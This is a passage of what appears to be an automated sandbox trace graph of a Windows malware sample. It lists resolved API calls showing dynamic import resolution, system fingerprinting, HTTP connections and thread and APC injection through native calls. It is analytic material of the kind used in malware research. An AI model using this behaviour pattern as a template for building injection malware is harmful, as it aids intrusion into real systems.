LdrGetProcedureAddress 16950->16951 16952 1b0a35bf044 16951->16952 16953 1b0a35bcce0 LdrGetProcedureAddress 16952->16953 16954 1b0a35bf063 16953->16954 16955 1b0a35bcce0 LdrGetProcedureAddress 16954->16955 16956 1b0a35bf082 16955->16956 16957 1b0a35bcce0 LdrGetProcedureAddress 16956->16957 16958 1b0a35bf0a1 16957->16958 16959 1b0a35bcce0 LdrGetProcedureAddress 16958->16959 16960 1b0a35bf0c0 16959->16960 16961 1b0a35bcce0 LdrGetProcedureAddress 16960->16961 16962 1b0a35bf0df 16961->16962 16963 1b0a35bcce0 LdrGetProcedureAddress 16962->16963 16964 1b0a35bf0fe 16963->16964 16965 1b0a35bcce0 LdrGetProcedureAddress 16964->16965 16966 1b0a35bf11d 16965->16966 16967 1b0a35bcce0 LdrGetProcedureAddress 16966->16967 16968 1b0a35bf13c 16967->16968 16969 1b0a35bcce0 LdrGetProcedureAddress 16968->16969 16970 1b0a35bf15b 16969->16970 16971 1b0a35bcce0 LdrGetProcedureAddress 16970->16971 16972 1b0a35bf17a 16971->16972 16973 1b0a35bcce0 LdrGetProcedureAddress 16972->16973 16974 1b0a35bf199 16973->16974 16975 1b0a35bcce0 LdrGetProcedureAddress 16974->16975 16976 1b0a35bf1b8 16975->16976 16977 1b0a35bcce0 LdrGetProcedureAddress 16976->16977 16978 1b0a35bf1d7 16977->16978 16979 1b0a35bcce0 LdrGetProcedureAddress 16978->16979 16980 1b0a35bf1f6 16979->16980 16981 1b0a35bcce0 LdrGetProcedureAddress 16980->16981 16982 1b0a35bf215 16981->16982 16983 1b0a35bcce0 LdrGetProcedureAddress 16982->16983 16984 1b0a35bf234 16983->16984 16985 1b0a35bcce0 LdrGetProcedureAddress 16984->16985 16986 1b0a35bf253 16985->16986 16987 1b0a35bcce0 LdrGetProcedureAddress 16986->16987 16988 1b0a35bf272 16987->16988 16989 1b0a35bcce0 LdrGetProcedureAddress 16988->16989 16990 1b0a35bf291 16989->16990 16991 1b0a35bcce0 LdrGetProcedureAddress 16990->16991 16992 1b0a35bf2b0 16991->16992 16993 1b0a35bcce0 LdrGetProcedureAddress 16992->16993 16994 1b0a35bf2cf 16993->16994 16995 1b0a35bcce0 LdrGetProcedureAddress 16994->16995 16996 1b0a35bf2ee 16995->16996 16997 1b0a35bcce0 LdrGetProcedureAddress 16996->16997 16998 1b0a35bf30d 16997->16998 16999 1b0a35bcce0 LdrGetProcedureAddress 16998->16999 17000 1b0a35bf32c 16999->17000 17001 1b0a35bcce0 LdrGetProcedureAddress 17000->17001 17002 1b0a35bf34b 17001->17002 17003 1b0a35bcce0 LdrGetProcedureAddress 17002->17003 17004 1b0a35bf36a 17003->17004 17005 1b0a35bcce0 LdrGetProcedureAddress 17004->17005 17006 1b0a35bf389 17005->17006 17007 1b0a35bcce0 LdrGetProcedureAddress 17006->17007 17008 1b0a35bf3a8 17007->17008 17009 1b0a35bcce0 LdrGetProcedureAddress 17008->17009 17010 1b0a35bf3c7 17009->17010 17011 1b0a35bcce0 LdrGetProcedureAddress 17010->17011 17012 1b0a35bf3e6 17011->17012 17013 1b0a35bcce0 LdrGetProcedureAddress 17012->17013 17014 1b0a35bf405 17013->17014 17015 1b0a35bcce0 LdrGetProcedureAddress 17014->17015 17016 1b0a35bf424 17015->17016 17017 1b0a35bcce0 LdrGetProcedureAddress 17016->17017 17018 1b0a35bf443 17017->17018 17019 1b0a35bcce0 LdrGetProcedureAddress 17018->17019 17020 1b0a35bf462 17019->17020 17021 1b0a35bcce0 LdrGetProcedureAddress 17020->17021 17022 1b0a35bf481 17021->17022 17023 1b0a35bcce0 LdrGetProcedureAddress 17022->17023 17024 1b0a35bf4a0 17023->17024 17025 1b0a35bcce0 LdrGetProcedureAddress 17024->17025 17026 1b0a35bf4bf 17025->17026 17027 1b0a35bcce0 LdrGetProcedureAddress 17026->17027 17028 1b0a35bf4de 17027->17028 17029 1b0a35bcce0 LdrGetProcedureAddress 17028->17029 17030 1b0a35bf4fd 17029->17030 17031 1b0a35bcce0 LdrGetProcedureAddress 17030->17031 17032 1b0a35bf51c 17031->17032 17033 1b0a35bcce0 LdrGetProcedureAddress 17032->17033 17034 1b0a35bf53b 17033->17034 17035 1b0a35bcce0 LdrGetProcedureAddress 17034->17035 17036 1b0a35bf55a 17035->17036 17037 1b0a35bcce0 LdrGetProcedureAddress 17036->17037 17038 1b0a35bf579 17037->17038 17039 1b0a35bcce0 LdrGetProcedureAddress 17038->17039 17040 1b0a35bf598 17039->17040 17041 1b0a35bcce0 LdrGetProcedureAddress 17040->17041 17042 1b0a35bf5b7 17041->17042 17043 1b0a35bcce0 LdrGetProcedureAddress 17042->17043 17044 1b0a35bf5d6 17043->17044 17045 1b0a35bcce0 LdrGetProcedureAddress 17044->17045 17045->16914 17171 1b0a35d4ce0 17046->17171 17049 1b0a35b8f71 17049->16896 17051 1b0a35d4dc7 GetComputerNameExW 17050->17051 17052 1b0a35d4db1 17050->17052 17053 1b0a35d4def 17051->17053 17052->17051 17054 1b0a35d4df3 GetTokenInformation 17053->17054 17055 1b0a35d4e1c 17053->17055 17054->17055 17056 1b0a35d4eaa GetNativeSystemInfo 17055->17056 17059 1b0a35d4ed3 17056->17059 17057 1b0a35d4f8f GetAdaptersInfo 17058 1b0a35d4fdd 17057->17058 17061 1b0a35d4fbb 17057->17061 17060 1b0a35d4fea GetAdaptersInfo 17058->17060 17058->17061 17059->17057 17060->17061 17061->16899 17064 1b0a35e4759 17062->17064 17063 1b0a35e47af 17063->16904 17064->17063 17065 1b0a35e47ad NtFreeVirtualMemory 17064->17065 17065->17063 17173 1b0a35c3270 17066->17173 17068 1b0a35c3dc0 17069 1b0a35c4067 17068->17069 17070 1b0a35c4060 17068->17070 17220 1b0a35b7830 17069->17220 17199 1b0a35c6fa0 17070->17199 17073 1b0a35c4065 17073->16904 17075 1b0a35b8bde 17074->17075 17076 1b0a35b8de9 17075->17076 17077 1b0a35b8df0 17075->17077 17078 1b0a35c6fa0 3 API calls 17076->17078 17079 1b0a35b7830 6 API calls 17077->17079 17082 1b0a35b8dee 17078->17082 17079->17082 17081 1b0a35b8e2a 17081->16904 17082->17081 17247 1b0a35b17b0 17082->17247 17085 1b0a35bfff9 17083->17085 17084 1b0a35b2939 17105 1b0a35bf8a0 17084->17105 17085->17084 17086 1b0a35c77e0 2 API calls 17085->17086 17087 1b0a35c0052 17086->17087 17087->17084 17088 1b0a35bcce0 LdrGetProcedureAddress 17087->17088 17089 1b0a35c0072 17088->17089 17090 1b0a35bcce0 LdrGetProcedureAddress 17089->17090 17091 1b0a35c008d 17090->17091 17092 1b0a35bcce0 LdrGetProcedureAddress 17091->17092 17093 1b0a35c00b6 17092->17093 17094 1b0a35bcce0 LdrGetProcedureAddress 17093->17094 17095 1b0a35c00d5 17094->17095 17096 1b0a35bcce0 LdrGetProcedureAddress 17095->17096 17097 1b0a35c00f4 17096->17097 17098 1b0a35bcce0 LdrGetProcedureAddress 17097->17098 17099 1b0a35c0113 17098->17099 17100 1b0a35bcce0 LdrGetProcedureAddress 17099->17100 17101 1b0a35c0132 17100->17101 17102 1b0a35bcce0 LdrGetProcedureAddress 17101->17102 17103 1b0a35c0151 17102->17103 17104 1b0a35bcce0 LdrGetProcedureAddress 17103->17104 17104->17084 17106 1b0a35bf8da 17105->17106 17107 1b0a35c77e0 2 API calls 17106->17107 17108 1b0a35bf8e4 17107->17108 17109 1b0a35b293e 17108->17109 17110 1b0a35bcce0 LdrGetProcedureAddress 17108->17110 17115 1b0a35c3470 17109->17115 17111 1b0a35bf900 17110->17111 17112 1b0a35bcce0 LdrGetProcedureAddress 17111->17112 17113 1b0a35bf91b 17112->17113 17114 1b0a35bcce0 LdrGetProcedureAddress 17113->17114 17114->17109 17116 1b0a35c3489 17115->17116 17117 1b0a35c77e0 2 API calls 17116->17117 17119 1b0a35c3493 17116->17119 17118 1b0a35c34e2 17117->17118 17118->17119 17120 1b0a35bcce0 LdrGetProcedureAddress 17118->17120 17119->16911 17121 1b0a35c3502 17120->17121 17122 1b0a35bcce0 LdrGetProcedureAddress 17121->17122 17123 1b0a35c351d 17122->17123 17124 1b0a35bcce0 LdrGetProcedureAddress 17123->17124 17125 1b0a35c3546 17124->17125 17126 1b0a35bcce0 LdrGetProcedureAddress 17125->17126 17127 1b0a35c3565 17126->17127 17128 1b0a35bcce0 LdrGetProcedureAddress 17127->17128 17129 1b0a35c3584 17128->17129 17130 1b0a35bcce0 LdrGetProcedureAddress 17129->17130 17131 1b0a35c35a3 17130->17131 17132 1b0a35bcce0 LdrGetProcedureAddress 17131->17132 17133 1b0a35c35c2 17132->17133 17134 1b0a35bcce0 LdrGetProcedureAddress 17133->17134 17135 1b0a35c35e1 17134->17135 17136 1b0a35bcce0 LdrGetProcedureAddress 17135->17136 17137 1b0a35c3600 17136->17137 17138 1b0a35bcce0 LdrGetProcedureAddress 17137->17138 17139 1b0a35c361f 17138->17139 17140 1b0a35bcce0 LdrGetProcedureAddress 17139->17140 17141 1b0a35c363e 17140->17141 17142 1b0a35bcce0 LdrGetProcedureAddress 17141->17142 17143 1b0a35c365d 17142->17143 17144 1b0a35bcce0 LdrGetProcedureAddress 17143->17144 17145 1b0a35c367c 17144->17145 17146 1b0a35bcce0 LdrGetProcedureAddress 17145->17146 17147 1b0a35c369b 17146->17147 17148 1b0a35bcce0 LdrGetProcedureAddress 17147->17148 17149 1b0a35c36ba 17148->17149 17150 1b0a35bcce0 LdrGetProcedureAddress 17149->17150 17151 1b0a35c36d9 17150->17151 17152 1b0a35bcce0 LdrGetProcedureAddress 17151->17152 17153 1b0a35c36f8 17152->17153 17154 1b0a35bcce0 LdrGetProcedureAddress 17153->17154 17155 1b0a35c3717 17154->17155 17156 1b0a35bcce0 LdrGetProcedureAddress 17155->17156 17157 1b0a35c3736 17156->17157 17158 1b0a35bcce0 LdrGetProcedureAddress 17157->17158 17159 1b0a35c3755 17158->17159 17160 1b0a35bcce0 LdrGetProcedureAddress 17159->17160 17160->17119 17162 1b0a35c7800 17161->17162 17163 1b0a35c780d RtlAddVectoredExceptionHandler 17162->17163 17166 1b0a35c7805 17162->17166 17164 1b0a35c7827 17163->17164 17165 1b0a35c78f1 RtlRemoveVectoredExceptionHandler 17164->17165 17164->17166 17165->17166 17166->16913 17169 1b0a35bcd1b 17167->17169 17168 1b0a35bcdbf 17168->16917 17169->17168 17170 1b0a35bcd9b LdrGetProcedureAddress 17169->17170 17170->17168 17172 1b0a35b8eee CreateMutexExA 17171->17172 17172->17049 17174 1b0a35c3287 17173->17174 17175 1b0a35c77e0 2 API calls 17174->17175 17198 1b0a35c3291 17174->17198 17176 1b0a35c32e6 17175->17176 17177 1b0a35bcce0 LdrGetProcedureAddress 17176->17177 17176->17198 17178 1b0a35c3306 17177->17178 17179 1b0a35bcce0 LdrGetProcedureAddress 17178->17179 17180 1b0a35c3321 17179->17180 17181 1b0a35bcce0 LdrGetProcedureAddress 17180->17181 17182 1b0a35c334a 17181->17182 17183 1b0a35bcce0 LdrGetProcedureAddress 17182->17183 17184 1b0a35c3369 17183->17184 17185 1b0a35bcce0 LdrGetProcedureAddress 17184->17185 17186 1b0a35c3388 17185->17186 17187 1b0a35bcce0 LdrGetProcedureAddress 17186->17187 17188 1b0a35c33a7 17187->17188 17189 1b0a35bcce0 LdrGetProcedureAddress 17188->17189 17190 1b0a35c33c6 17189->17190 17191 1b0a35bcce0 LdrGetProcedureAddress 17190->17191 17192 1b0a35c33e5 17191->17192 17193 1b0a35bcce0 LdrGetProcedureAddress 17192->17193 17194 1b0a35c3404 17193->17194 17195 1b0a35bcce0 LdrGetProcedureAddress 17194->17195 17196 1b0a35c3423 17195->17196 17197 1b0a35bcce0 LdrGetProcedureAddress 17196->17197 17197->17198 17198->17068 17200 1b0a35c7037 17199->17200 17201 1b0a35c70a9 17200->17201 17202 1b0a35c7319 17200->17202 17232 1b0a35b7370 17201->17232 17205 1b0a35b7370 3 API calls 17202->17205 17204 1b0a35c7740 17204->17073 17207 1b0a35c73b9 17205->17207 17206 1b0a35b7370 3 API calls 17206->17207 17207->17204 17207->17206 17213 1b0a35c7452 17207->17213 17208 1b0a35b7370 3 API calls 17209 1b0a35c713a 17208->17209 17209->17204 17209->17208 17212 1b0a35c7257 17209->17212 17210 1b0a35b7370 3 API calls 17210->17212 17211 1b0a35b7370 3 API calls 17211->17213 17212->17210 17212->17213 17213->17211 17215 1b0a35c74f8 17213->17215 17214 1b0a35b7370 3 API calls 17214->17215 17215->17204 17215->17214 17217 1b0a35c75b1 17215->17217 17216 1b0a35b7370 3 API calls 17216->17217 17217->17204 17217->17216 17219 1b0a35c769e 17217->17219 17218 1b0a35b7370 3 API calls 17218->17219 17219->17204 17219->17218 17221 1b0a35b788a InternetOpenW 17220->17221 17222 1b0a35b7885 17220->17222 17223 1b0a35b7ae3 17221->17223 17224 1b0a35b7898 InternetConnectW 17221->17224 17222->17221 17226 1b0a35b7b0e InternetCloseHandle 17223->17226 17229 1b0a35b7b17 17223->17229 17224->17223 17225 1b0a35b78dd HttpOpenRequestW 17224->17225 17225->17223 17227 1b0a35b7931 17225->17227 17226->17229 17227->17223 17228 1b0a35b79cb HttpSendRequestA 17227->17228 17228->17223 17231 1b0a35b79e4 17228->17231 17229->17073 17230 1b0a35b7a3f InternetQueryDataAvailable 17230->17223 17230->17231 17231->17223 17231->17230 17235 1b0a35bfb20 17232->17235 17234 1b0a35b73a4 17234->17209 17236 1b0a35bfb39 17235->17236 17237 1b0a35c77e0 2 API calls 17236->17237 17239 1b0a35bfb43 17236->17239 17238 1b0a35bfb92 17237->17238 17238->17239 17240 1b0a35bcce0 LdrGetProcedureAddress 17238->17240 17239->17234 17241 1b0a35bfbae 17240->17241 17242 1b0a35bcce0 LdrGetProcedureAddress 17241->17242 17243 1b0a35bfbc9 17242->17243 17244 1b0a35bcce0 LdrGetProcedureAddress 17243->17244 17245 1b0a35bfbf0 17244->17245 17246 1b0a35bcce0 LdrGetProcedureAddress 17245->17246 17246->17239 17250 1b0a35b17f5 17247->17250 17248 1b0a35b180f 17248->17081 17250->17248 17251 1b0a35b4cd0 17250->17251 17256 1b0a35e4360 17251->17256 17255 1b0a35b4d58 17255->17250 17258 1b0a35e43bd 17256->17258 17257 1b0a35b4d3d 17260 1b0a35e4ff0 17257->17260 17258->17257 17259 1b0a35e444e NtCreateThreadEx 17258->17259 17259->17257 17262 1b0a35e5011 17260->17262 17261 1b0a35e506c 17261->17255 17262->17261 17263 1b0a35e506a RtlQueueApcWow64Thread 17262->17263 17263->17261 18001 1b0a35d3ef0 18004 1b0a35c2d20 18001->18004 18003 1b0a35d3f00 18005 1b0a35c2d39 18004->18005 18006 1b0a35c77e0 2 API calls 18005->18006 18067 1b0a35c2d43 18005->18067 18007 1b0a35c2d92 18006->18007 18008 1b0a35bcce0 LdrGetProcedureAddress 18007->18008 18007->18067 18009 1b0a35c2db2 18008->18009 18010 1b0a35bcce0 LdrGetProcedureAddress 18009->18010 18011 1b0a35c2dcd 18010->18011 18012 1b0a35bcce0 LdrGetProcedureAddress 18011->18012 18013 1b0a35c2df6 18012->18013 18014 1b0a35bcce0 LdrGetProcedureAddress 18013->18014 18015 1b0a35c2e15 18014->18015 18016 1b0a35bcce0 LdrGetProcedureAddress 18015->18016 18017 1b0a35c2e34 18016->18017 18018 1b0a35bcce0 LdrGetProcedureAddress 18017->18018 18019 1b0a35c2e53 18018->18019 18020 1b0a35bcce0 LdrGetProcedureAddress 18019->18020 18021 1b0a35c2e72 18020->18021 18022 1b0a35bcce0 LdrGetProcedureAddress 18021->18022 18023 1b0a35c2e91 18022->18023 18024 1b0a35bcce0 LdrGetProcedureAddress 18023->18024 18025 1b0a35c2eb0 18024->18025 18026 1b0a35bcce0 LdrGetProcedureAddress 18025->18026 18027 1b0a35c2ecf 18026->18027 18028 1b0a35bcce0 LdrGetProcedureAddress 18027->18028 18029 1b0a35c2eee 18028->18029 18030 1b0a35bcce0 LdrGetProcedureAddress 18029->18030 18031 1b0a35c2f0d 18030->18031 18032 1b0a35bcce0 LdrGetProcedureAddress 18031->18032 18033 1b0a35c2f2c 18032->18033 18034 1b0a35bcce0 LdrGetProcedureAddress 18033->18034 18035 1b0a35c2f4b 18034->18035 18036 1b0a35bcce0 LdrGetProcedureAddress 18035->18036 18037 1b0a35c2f6a 18036->18037 18038 1b0a35bcce0 LdrGetProcedureAddress 18037->18038 18039 1b0a35c2f89 18038->18039 18040 1b0a35bcce0 LdrGetProcedureAddress 18039->18040 18041 1b0a35c2fa8 18040->18041 18042 1b0a35bcce0 LdrGetProcedureAddress 18041->18042 18043 1b0a35c2fc7 18042->18043 18044 1b0a35bcce0 LdrGetProcedureAddress 18043->18044 18045 1b0a35c2fe6 18044->18045 18046 1b0a35bcce0 LdrGetProcedureAddress 18045->18046 18047 1b0a35c3005 18046->18047 18048 1b0a35bcce0 LdrGetProcedureAddress 18047->18048 18049 1b0a35c3024 18048->18049 18050 1b0a35bcce0 LdrGetProcedureAddress 18049->18050 18051 1b0a35c3043 18050->18051 18052 1b0a35bcce0 LdrGetProcedureAddress 18051->18052 18053 1b0a35c3062 18052->18053 18054 1b0a35bcce0 LdrGetProcedureAddress 18053->18054 18055 1b0a35c3081 18054->18055 18056 1b0a35bcce0 LdrGetProcedureAddress 18055->18056 18057 1b0a35c30a0 18056->18057 18058 1b0a35bcce0 LdrGetProcedureAddress 18057->18058 18059 1b0a35c30bf 18058->18059 18060 1b0a35bcce0 LdrGetProcedureAddress 18059->18060 18061 1b0a35c30de 18060->18061 18062 1b0a35bcce0 LdrGetProcedureAddress 18061->18062 18063 1b0a35c30fd 18062->18063 18064 1b0a35bcce0 LdrGetProcedureAddress 18063->18064 18065 1b0a35c311c 18064->18065 18066 1b0a35bcce0 LdrGetProcedureAddress 18065->18066 18066->18067 18067->18003 18068 1b0a35dbcf0 18069 1b0a35dbd10 18068->18069 18070 1b0a35db5e0 4 API calls 18069->18070 18071 1b0a35dbd80 18069->18071 18070->18071 18455 1b0a35dc170 18456 1b0a35bedb0 3 API calls 18455->18456 18457 1b0a35dc18a 18456->18457 18458 1b0a35c28c0 3 API calls 18457->18458 18459 1b0a35dc18f 18458->18459 18796 1b0a35d4a70 18797 1b0a35d4a91 18796->18797 18798 1b0a35e4be0 NtProtectVirtualMemory 18797->18798 18801 1b0a35d4af3 18797->18801 18799 1b0a35d4be9 18798->18799 18800 1b0a35e4be0 NtProtectVirtualMemory 18799->18800 18799->18801 18800->18801 18802 1b0a35dac70 18803 1b0a35dac86 18802->18803 18804 1b0a35b4cd0 2 API calls 18803->18804 18805 1b0a35dae29 18803->18805 18804->18805 18072 1b0a35df0f0 18092 1b0a35c1150 18072->18092 18080 1b0a35df11c 18081 1b0a35df34b 18080->18081 18091 1b0a35df2c6 18080->18091 18146 1b0a35ba230 18080->18146 18082 1b0a35ba230 3 API calls 18081->18082 18082->18091 18084 1b0a35df269 18085 1b0a35b4cd0 2 API calls 18084->18085 18084->18091 18086 1b0a35df27c 18085->18086 18086->18081 18087 1b0a35df288 18086->18087 18151 1b0a35ccbe0 18087->18151 18089 1b0a35df2b3 18090 1b0a35ba230 3 API calls 18089->18090 18090->18091 18094 1b0a35c1166 18092->18094 18093 1b0a35c1170 18098 1b0a35c1210 18093->18098 18094->18093 18095 1b0a35c77e0 2 API calls 18094->18095 18096 1b0a35c11c5 18095->18096 18096->18093 18097 1b0a35bcce0 LdrGetProcedureAddress 18096->18097 18097->18093 18099 1b0a35c1228 18098->18099 18100 1b0a35c77e0 2 API calls 18099->18100 18102 1b0a35c1232 18099->18102 18101 1b0a35c1281 18100->18101 18101->18102 18103 1b0a35bcce0 LdrGetProcedureAddress 18101->18103 18104 1b0a35c23d0 18102->18104 18103->18102 18105 1b0a35c23e9 18104->18105 18106 1b0a35c77e0 2 API calls 18105->18106 18108 1b0a35c23f3 18105->18108 18107 1b0a35c2442 18106->18107 18107->18108 18109 1b0a35bcce0 LdrGetProcedureAddress 18107->18109 18138 1b0a35c2c40 18108->18138 18110 1b0a35c2462 18109->18110 18111 1b0a35bcce0 LdrGetProcedureAddress 18110->18111 18112 1b0a35c247d 18111->18112 18113 1b0a35bcce0 LdrGetProcedureAddress 18112->18113 18114 1b0a35c24a6 18113->18114 18115 1b0a35bcce0 LdrGetProcedureAddress 18114->18115 18116 1b0a35c24c5 18115->18116 18117 1b0a35bcce0 LdrGetProcedureAddress 18116->18117 18118 1b0a35c24e4 18117->18118 18119 1b0a35bcce0 LdrGetProcedureAddress 18118->18119 18120 1b0a35c2503 18119->18120 18121 1b0a35bcce0 LdrGetProcedureAddress 18120->18121 18122 1b0a35c2522 18121->18122 18123 1b0a35bcce0 LdrGetProcedureAddress 18122->18123 18124 1b0a35c2541 18123->18124 18125 1b0a35bcce0 LdrGetProcedureAddress 18124->18125 18126 1b0a35c2560 18125->18126 18127 1b0a35bcce0 LdrGetProcedureAddress 18126->18127 18128 1b0a35c257f 18127->18128 18129 1b0a35bcce0 LdrGetProcedureAddress 18128->18129 18130 1b0a35c259e 18129->18130 18131 1b0a35bcce0 LdrGetProcedureAddress 18130->18131 18132 1b0a35c25bd 18131->18132 18133 1b0a35bcce0 LdrGetProcedureAddress 18132->18133 18134 1b0a35c25dc 18133->18134 18135 1b0a35bcce0 LdrGetProcedureAddress 18134->18135 18136 1b0a35c25fb 18135->18136 18137 1b0a35bcce0 LdrGetProcedureAddress 18136->18137 18137->18108 18139 1b0a35c2c57 18138->18139 18140 1b0a35c77e0 2 API calls 18139->18140 18142 1b0a35c2c61 18139->18142 18141 1b0a35c2cb6 18140->18141 18141->18142 18143 1b0a35bcce0 LdrGetProcedureAddress 18141->18143 18142->18080 18144 1b0a35c2ccf 18143->18144 18145 1b0a35bcce0 LdrGetProcedureAddress 18144->18145 18145->18142 18164 1b0a35c12c0 18146->18164 18149 1b0a35c2d20 3 API calls 18150 1b0a35ba24a 18149->18150 18150->18084 18152 1b0a35ccc16 18151->18152 18156 1b0a35ccc6b 18151->18156 18153 1b0a35c77e0 2 API calls 18152->18153 18154 1b0a35ccc59 18153->18154 18155 1b0a35bcce0 LdrGetProcedureAddress 18154->18155 18154->18156 18155->18156 18157 1b0a35cd04d 18156->18157 18158 1b0a35ccf44 18156->18158 18163 1b0a35ccf5a 18156->18163 18160 1b0a35cb410 LdrGetProcedureAddress 18157->18160 18186 1b0a35cb250 18158->18186 18160->18163 18161 1b0a35ccf51 18161->18163 18190 1b0a35cb410 18161->18190 18163->18089 18165 1b0a35c12f6 18164->18165 18166 1b0a35c77e0 2 API calls 18165->18166 18167 1b0a35c1300 18166->18167 18168 1b0a35bcce0 LdrGetProcedureAddress 18167->18168 18185 1b0a35ba245 18167->18185 18169 1b0a35c1320 18168->18169 18170 1b0a35bcce0 LdrGetProcedureAddress 18169->18170 18171 1b0a35c133b 18170->18171 18172 1b0a35bcce0 LdrGetProcedureAddress 18171->18172 18173 1b0a35c1364 18172->18173 18174 1b0a35bcce0 LdrGetProcedureAddress 18173->18174 18175 1b0a35c1383 18174->18175 18176 1b0a35bcce0 LdrGetProcedureAddress 18175->18176 18177 1b0a35c13a2 18176->18177 18178 1b0a35bcce0 LdrGetProcedureAddress 18177->18178 18179 1b0a35c13c1 18178->18179 18180 1b0a35bcce0 LdrGetProcedureAddress 18179->18180 18181 1b0a35c13e0 18180->18181 18182 1b0a35bcce0 LdrGetProcedureAddress 18181->18182 18183 1b0a35c13ff 18182->18183 18184 1b0a35bcce0 LdrGetProcedureAddress 18183->18184 18184->18185 18185->18149 18187 1b0a35cb285 18186->18187 18188 1b0a35bcce0 LdrGetProcedureAddress 18187->18188 18189 1b0a35cb296 18188->18189 18189->18161 18191 1b0a35cb43b 18190->18191 18192 1b0a35bcce0 LdrGetProcedureAddress 18191->18192 18193 1b0a35cb44c 18192->18193 18193->18163 18806 1b0a35b4ea1 18807 1b0a35b4f60 18806->18807 18817 1b0a35b4fb0 18806->18817 18808 1b0a35b5190 NtReadVirtualMemory 18807->18808 18809 1b0a35b4fac 18808->18809 18810 1b0a35ba370 NtReadVirtualMemory 18809->18810 18809->18817 18811 1b0a35b4fe1 18810->18811 18812 1b0a35ba370 NtReadVirtualMemory 18811->18812 18811->18817 18813 1b0a35b5009 18812->18813 18813->18817 18818 1b0a35b1290 18813->18818 18815 1b0a35b502d 18816 1b0a35b1290 NtReadVirtualMemory 18815->18816 18815->18817 18816->18817 18819 1b0a35b12b1 18818->18819 18820 1b0a35ba370 NtReadVirtualMemory 18819->18820 18829 1b0a35b131b 18819->18829 18821 1b0a35b1317 18820->18821 18822 1b0a35ba370 NtReadVirtualMemory 18821->18822 18821->18829 18823 1b0a35b1358 18822->18823 18824 1b0a35ba370 NtReadVirtualMemory 18823->18824 18823->18829 18825 1b0a35b137c 18824->18825 18826 1b0a35ba370 NtReadVirtualMemory 18825->18826 18825->18829 18827 1b0a35b13a4 18826->18827 18828 1b0a35ba370 NtReadVirtualMemory 18827->18828 18827->18829 18828->18829 18829->18815 18194 1b0a35c9120 18195 1b0a35c9146 18194->18195 18197 1b0a35c9156 18195->18197 18198 1b0a35bedb0 18195->18198 18199 1b0a35bede6 18198->18199 18200 1b0a35c77e0 2 API calls 18199->18200 18201 1b0a35bedf0 18200->18201 18202 1b0a35bf5f5 18201->18202 18203 1b0a35bcce0 LdrGetProcedureAddress 18201->18203 18202->18197 18204 1b0a35bee10 18203->18204 18205 1b0a35bcce0 LdrGetProcedureAddress 18204->18205 18206 1b0a35bee2b 18205->18206 18207 1b0a35bcce0 LdrGetProcedureAddress 18206->18207 18208 1b0a35bee54 18207->18208 18209 1b0a35bcce0 LdrGetProcedureAddress 18208->18209 18210 1b0a35bee73 18209->18210 18211 1b0a35bcce0 LdrGetProcedureAddress 18210->18211 18212 1b0a35bee92 18211->18212 18213 1b0a35bcce0 LdrGetProcedureAddress 18212->18213 18214 1b0a35beeb1 18213->18214 18215 1b0a35bcce0 LdrGetProcedureAddress 18214->18215 18216 1b0a35beed0 18215->18216 18217 1b0a35bcce0 LdrGetProcedureAddress 18216->18217 18218 1b0a35beeef 18217->18218 18219 1b0a35bcce0 LdrGetProcedureAddress 18218->18219 18220 1b0a35bef0e 18219->18220 18221 1b0a35bcce0 LdrGetProcedureAddress 18220->18221 18222 1b0a35bef2d 18221->18222 18223 1b0a35bcce0 LdrGetProcedureAddress 18222->18223 18224 1b0a35bef4c 18223->18224 18225 1b0a35bcce0 LdrGetProcedureAddress 18224->18225 18226 1b0a35bef6b 18225->18226 18227 1b0a35bcce0 LdrGetProcedureAddress 18226->18227 18228 1b0a35bef8a 18227->18228 18229 1b0a35bcce0 LdrGetProcedureAddress 18228->18229 18230 1b0a35befa9 18229->18230 18231 1b0a35bcce0 LdrGetProcedureAddress 18230->18231 18232 1b0a35befc8 18231->18232 18233 1b0a35bcce0 LdrGetProcedureAddress 18232->18233 18234 1b0a35befe7 18233->18234 18235 1b0a35bcce0 LdrGetProcedureAddress 18234->18235 18236 1b0a35bf006 18235->18236 18237 1b0a35bcce0 LdrGetProcedureAddress 18236->18237 18238 1b0a35bf025 18237->18238 18239 1b0a35bcce0 LdrGetProcedureAddress 18238->18239 18240 1b0a35bf044 18239->18240 18241 1b0a35bcce0 LdrGetProcedureAddress 18240->18241 18242 1b0a35bf063 18241->18242 18243 1b0a35bcce0 LdrGetProcedureAddress 18242->18243 18244 1b0a35bf082 18243->18244 18245 1b0a35bcce0 LdrGetProcedureAddress 18244->18245 18246 1b0a35bf0a1 18245->18246 18247 1b0a35bcce0 LdrGetProcedureAddress 18246->18247 18248 1b0a35bf0c0 18247->18248 18249 1b0a35bcce0 LdrGetProcedureAddress 18248->18249 18250 1b0a35bf0df 18249->18250 18251 1b0a35bcce0 LdrGetProcedureAddress 18250->18251 18252 1b0a35bf0fe 18251->18252 18253 1b0a35bcce0 LdrGetProcedureAddress 18252->18253 18254 1b0a35bf11d 18253->18254 18255 1b0a35bcce0 LdrGetProcedureAddress 18254->18255 18256 1b0a35bf13c 18255->18256 18257 1b0a35bcce0 LdrGetProcedureAddress 18256->18257 18258 1b0a35bf15b 18257->18258 18259 1b0a35bcce0 LdrGetProcedureAddress 18258->18259 18260 1b0a35bf17a 18259->18260 18261 1b0a35bcce0 LdrGetProcedureAddress 18260->18261 18262 1b0a35bf199 18261->18262 18263 1b0a35bcce0 LdrGetProcedureAddress 18262->18263 18264 1b0a35bf1b8 18263->18264 18265 1b0a35bcce0 LdrGetProcedureAddress 18264->18265 18266 1b0a35bf1d7 18265->18266 18267 1b0a35bcce0 LdrGetProcedureAddress 18266->18267 18268 1b0a35bf1f6 18267->18268 18269 1b0a35bcce0 LdrGetProcedureAddress 18268->18269 18270 1b0a35bf215 18269->18270 18271 1b0a35bcce0 LdrGetProcedureAddress 18270->18271 18272 1b0a35bf234 18271->18272 18273 1b0a35bcce0 LdrGetProcedureAddress 18272->18273 18274 1b0a35bf253 18273->18274 18275 1b0a35bcce0 LdrGetProcedureAddress 18274->18275 18276 1b0a35bf272 18275->18276 18277 1b0a35bcce0 LdrGetProcedureAddress 18276->18277 18278 1b0a35bf291 18277->18278 18279 1b0a35bcce0 LdrGetProcedureAddress 18278->18279 18280 1b0a35bf2b0 18279->18280 18281 1b0a35bcce0 LdrGetProcedureAddress 18280->18281 18282 1b0a35bf2cf 18281->18282 18283 1b0a35bcce0 LdrGetProcedureAddress 18282->18283 18284 1b0a35bf2ee 18283->18284 18285 1b0a35bcce0 LdrGetProcedureAddress 18284->18285 18286 1b0a35bf30d 18285->18286 18287 1b0a35bcce0 LdrGetProcedureAddress 18286->18287 18288 1b0a35bf32c 18287->18288 18289 1b0a35bcce0 LdrGetProcedureAddress 18288->18289 